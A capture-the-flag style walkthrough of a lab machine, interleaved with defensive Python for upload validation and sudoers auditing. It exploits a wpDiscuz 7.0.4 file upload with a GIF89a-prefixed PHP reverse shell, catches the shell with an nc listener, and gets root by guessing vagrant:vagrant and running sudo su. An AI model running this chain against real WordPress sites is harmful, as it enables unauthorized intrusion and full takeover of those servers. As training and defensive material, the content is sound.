Blogger - Walkthrough

Summary

In this guide we exploit an arbitrary file upload in version 7.0.4 of the wpDiscuz WordPress plugin and then obtain root access through a simple and straightforward privilege escalation.

Enumeration

We begin the enumeration process with an nmap scan.

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.120.183            

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-05 04:19 MST
Nmap scan report for 192.168.120.183
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds

We see ports 22 and 80 open on the target.

Navigating to port 80 we see the following static webpage.

(Screenshot: home page)

Turning our attention to content discovery, we brute-force directories with gobuster.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.120.183/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.120.183/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/08/04 07:37:35 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.120.183/images/]
/assets               (Status: 301) [Size: 319] [--> http://192.168.120.183/assets/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.120.183/css/]   
/js                   (Status: 301) [Size: 315] [--> http://192.168.120.183/js/] 

Browsing the assets directory, we find a blog directory under the assets/fonts path, which turns out to be a WordPress site.

(Screenshot: WordPress blog under assets/fonts/blog)

During enumeration we skim through the page source of a blog post and see that the site uses version 7.0.4 of the wpDiscuz plugin.

┌──(kali㉿kali)-[~]
└─$ curl http://blogger.pg/assets/fonts/blog/?p=29
<!DOCTYPE html>
<html lang="en-US">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="http://blogger.pg/assets/fonts/blog/xmlrpc.php">
......
<link rel='stylesheet' id='wpdiscuz-frontend-css-css'  href='http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/themes/default/style.css?ver=7.0.4' type='text/css' media='all' />

After researching wpDiscuz version 7.0.4, we find that it is vulnerable to an unauthenticated arbitrary file upload.

Navigating to the comment section of any blog post, we see an upload form that accepts images.

(Screenshot: comment section with the image upload form)

Since the comment section includes an upload form for images, we can attempt to upload a reverse shell disguised as a GIF89a file, as image upload functionality commonly accepts GIFs.

We begin by grabbing a copy of a reverse shell to upload to the target; we use the php-reverse-shell.php that is installed on Kali by default.

┌──(kali㉿kali)-[~/blogger]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php .

We add GIF89a; as the first line of php-reverse-shell.php so that the file passes any simple file-type filter.

GIF89a;
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
...

Next, we set up a listener on our attack machine.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...

Now we navigate to the comment section of any blog post, attach our php-reverse-shell.php, fill in the required form fields and submit the comment.

(Screenshot: comment form with php-reverse-shell.php attached)

We receive a connection back on our listener and stabilize the shell by spawning a pty with python3.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.118.4] from (UNKNOWN) [192.168.120.150] 42538
Linux ubuntu-xenial 4.4.0-206-generic #238-Ubuntu SMP Tue Mar 16 07:52:37 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 15:39:15 up 58 min,  1 user,  load average: 0.04, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1                      14:41   57:54   0.05s  0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu-xenial:/$
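From the defender's side, the GIF89a; prefix above works because an upload check that only looks at the leading bytes (or only at the declared MIME type) accepts the file. The following server-side validator and scanner is an added example, not code from the original post or from wpDiscuz: it checks the extension allowlist, the magic bytes, their agreement with the extension, and the absence of PHP open tags, and it also scans already-stored files for the same polyglot pattern. File names and sample contents are constructed.

```python
import re
from pathlib import PurePosixPath

# Magic bytes of the image formats a comment upload form would normally accept
IMAGE_MAGIC = {b"GIF87a": "gif", b"GIF89a": "gif", b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg"}
ALLOWED_EXT = {"gif": "gif", "png": "png", "jpg": "jpg", "jpeg": "jpg"}  # extension -> expected format
EXEC_EXT = {"php", "php3", "php5", "phtml", "phar"}
# PHP open tags: a "GIF89a;<?php ..." polyglot carries a valid GIF magic AND one of these
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

def image_format(data: bytes):
    """Return the image format implied by the leading bytes, or None."""
    for magic, fmt in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None

def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Server-side validation of one upload; returns (accepted, reason)."""
    suffixes = [s[1:].lower() for s in PurePosixPath(filename).suffixes]
    if not suffixes or suffixes[-1] not in ALLOWED_EXT:
        return False, "extension not in image allowlist"
    if EXEC_EXT.intersection(suffixes[:-1]):            # e.g. shell.php.gif
        return False, "executable extension hidden before image extension"
    fmt = image_format(data)
    if fmt is None:
        return False, "content does not start with image magic bytes"
    if fmt != ALLOWED_EXT[suffixes[-1]]:
        return False, "magic bytes do not match the declared extension"
    if PHP_TAG.search(data):                            # the GIF89a; polyglot lands here
        return False, "PHP open tag embedded in image data"
    return True, "ok"

def scan_uploads(files: dict[str, bytes]) -> list[str]:
    """Detection view for stored files (e.g. wp-content/uploads): names carrying a PHP tag."""
    return sorted(name for name, data in files.items() if PHP_TAG.search(data))

# Constructed samples: a 1x1 transparent GIF, and the GIF header glued onto a harmless PHP stub
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff\x21\xf9\x04\x01\x00\x00"
            b"\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
POLYGLOT = b"GIF89a;\n<?php echo 'constructed polyglot sample'; ?>\n"

if __name__ == "__main__":
    for name, data in {"avatar.gif": REAL_GIF, "avatar2.gif": POLYGLOT, "php-reverse-shell.php": POLYGLOT}.items():
        print(name, check_upload(name, data))
```

Content checks alone are not enough: the uploads directory should also have PHP execution disabled at the web server, so that a file which slips past the filter cannot be executed.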

Privilege Escalation

In the /home directory we see the users james, ubuntu and vagrant.

www-data@ubuntu-xenial:/home$ ls
ls
james  ubuntu  vagrant

We guess the credentials of the vagrant user as vagrant:vagrant, and the guess is correct.

www-data@ubuntu-xenial:/$ su vagrant
su vagrant
Password: vagrant
vagrant@ubuntu-xenial:/$

Running sudo -l reveals that the vagrant user may run any command as root without a password.

vagrant@ubuntu-xenial:/$ sudo -l
sudo -l
Matching Defaults entries for vagrant on ubuntu-xenial:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vagrant may run the following commands on ubuntu-xenial:
    (ALL) NOPASSWD: ALL

We can achieve root access by using sudo su.

vagrant@ubuntu-xenial:/$ sudo su 
sudo su 
root@ubuntu-xenial:/# id
id
uid=0(root) gid=0(root) groups=0(root)
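The privilege escalation rests on two findings a host audit should catch: a default password on the vagrant account and a (ALL) NOPASSWD: ALL grant. The following sudoers audit is an added example, not part of the original post; it parses user specifications and reports principals that can run any command as root without a password. The sudoers text is constructed to mirror the sudo -l output above.

```python
import re

# One sudoers user specification:  who  host=(runas)  [TAG: ...]  commands
SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

def parse_sudoers(text: str) -> list[dict]:
    """Parse user specifications; Defaults, alias definitions, comments and blanks are skipped."""
    specs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.split()[0] in SKIP:
            continue
        m = SPEC.match(line)
        if not m:
            continue                                   # @include lines etc. are not modelled
        d = m.groupdict()
        d["tags"] = d["tags"].replace(":", " ").split()  # "NOPASSWD: " -> ["NOPASSWD"]
        d["runas"] = d["runas"] or "root"               # sudoers default when no runas list is given
        specs.append(d)
    return specs

def unrestricted_nopasswd(text: str) -> list[str]:
    """Principals that may run ANY command as root without a password."""
    return [s["who"] for s in parse_sudoers(text)
            if "NOPASSWD" in s["tags"] and s["cmds"] == "ALL"
            and s["runas"].split(":")[0] in ("ALL", "root")]

# Constructed sudoers content mirroring the sudo -l output above
SAMPLE = """\
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
vagrant ALL=(ALL) NOPASSWD: ALL
james   ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    print("unrestricted passwordless root:", unrestricted_nopasswd(SAMPLE))
```

On a real host, feed it the concatenation of /etc/sudoers and the files under /etc/sudoers.d, and treat every hit on a non-administrative or vendor-provisioned account such as vagrant as a finding.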

This post is licensed under CC BY 4.0 by the author.